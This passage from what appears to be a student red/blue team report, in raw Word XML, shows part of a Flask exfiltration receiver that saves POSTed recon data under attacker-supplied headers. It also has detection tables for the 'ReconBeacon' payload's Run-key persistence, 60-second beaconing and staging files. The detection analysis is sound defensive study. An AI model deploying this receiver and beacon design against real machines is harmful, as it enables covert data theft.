                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    data      = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>request.get_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>()                          # raw bytes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AC55133" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="3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host_id</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request.headers.get</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>("X-Host", "unknown")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EC8FAA7" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    filename  = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>request.headers.get</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>("X-Filename", "recon.txt")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F44AC83" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    timestamp = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>datetime.utcnow</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strftime</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Y%m%d</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>_%H%M%S")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="389B013F" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="3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out_path</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  = f"{</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>host_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>}_{timestamp}_{filename}"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D8B97D8" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    open(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>out_path</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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wb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>").write(data)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F4CF7A8" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    return </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>jsonify</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>({"status": "ok", "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>saved_as</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out_path</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>}), 200</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="100C6740" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="46E1B952" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="5C8F6C08" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc226583757"/>
      <w:r>
        <w:t>5. Blue Team Analysis — Detection and Defence</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="053068AB" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D2C21F8" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="111FE344" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>For every offensive technique implemented, this section documents the corresponding defensive detection method, the tool that surfaces it, and the severity of the detection signal. This analysis is the core academic contribution of the project: demonstrating not just how the attack works, but how a defender would identify and respond to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5E55B6" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="310AEED3" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="0B78E7FA" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc226583758"/>
      <w:r>
        <w:t>5.1  Host-Based Detection</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1800"/>
        <w:gridCol w:w="1526"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C0DF0" w14:paraId="48588ACB"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6814B3" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Detection Method</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EED752" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>What Is Caught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C7126B" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Trigger</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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1A8476" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="35FB76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1651E" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sysmon EID 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0DB70" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cmd.exe spawned by payload — parent process anomaly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EF942" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Process chain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D1AD7" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="3F7B9D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1062F6" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sysmon EID 13</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B140CD" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Registry write to HKCU\...\Run — persistence key created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0FAC40" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HKCU Run write</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FDA6F" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Very High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="1707F9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BB029" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sysmon EID 11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1D28F" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C:\temp\recon_combined.txt created every 60s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7A498" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Staging artefact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24398" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="204B04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98771" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sysmon EID 3</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DC43B" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Outbound connection to operator IP:5000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DDE87" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Network beacon</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ECBBD" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="4D2B14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F33B7" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Autoruns.exe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FEFA2" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ReconBeacon</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Run key — unknown/unsigned binary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9194D" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Startup item</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C9E21" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Very High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="0ED7E4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DD59C" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Process Monitor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88688" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Full file/registry trace during payload execution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9DE67A" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Forensic analysis</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F8C59" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="0A1AC2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16A55" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>strings.exe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8F37B" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C2 URL, registry path, commands visible in binary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17CCB" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Static analysis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D39AF" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B20B69" w14:paraId="1C8711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CC3DC" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pP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2B545" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rP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1CEB" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pP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F18CC" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55596B01" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="0E523B25" w14:textId="0999AA8E" w:rsidR="00B20B69" w:rsidRDefault="00B20B69">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02BF9E71" wp14:editId="4C50B7AA">
            <wp:extent cx="2534785" cy="3673475"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="158365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41448" cy="3683132"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="325886B7" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="4C9F8137" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="0DF8D8A3" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="23B591B2" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="22C265FD" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="01003612" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="1607D7F0" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="00BD408E" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="5A5646D2" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="1124098E" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="3BB00F3E" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="7ACC8E76" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="7909F256" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="3DFA8E01" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="3BBB1B2D" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="622F5F69" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="3D89F92A" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="0C0A495A" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="5F7311D6" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="19F0E854" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="04DCE5F5" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="5F1074CE" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="7B3CC3D3" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="4A8816CF" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="2ED1AC9C" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="4971E6E4" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="4A2EFB0B" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="12B3BBE4" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="6260639B" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="10C16B60" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="65688D51" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="2915A2FB" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="34F457F7" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="7455944E" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="3D59DCEC" w14:textId="77777777" w:rsidR="00B20B69" w:rsidRDefault="00B20B69"/>
    <w:p w14:paraId="14CAE574" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc226583759"/>
      <w:r>
        <w:t>5.2  Network-Based Detection</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C0DF0" w14:paraId="0BDCAE3E"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D145B8" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Detection Method</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6C6E9F" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>What It Catches</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="558F3A6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54A41" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Wireshark / Packet Capture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E6F43" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>X-Host and X-Filename headers visible in plaintext HTTP — non-standard headers are a signature</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="15D0B83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04BD2" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Zeek / Suricata beacon detection</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99F4A" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Fixed 60-second inter-arrival time on outbound connections — flagged as beaconing pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="6307126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80A20" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Network flow logs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90F92" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Repeated POST to same </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IP:port</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> at regular intervals — volume and destination analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="41A5EB03"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908E1" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
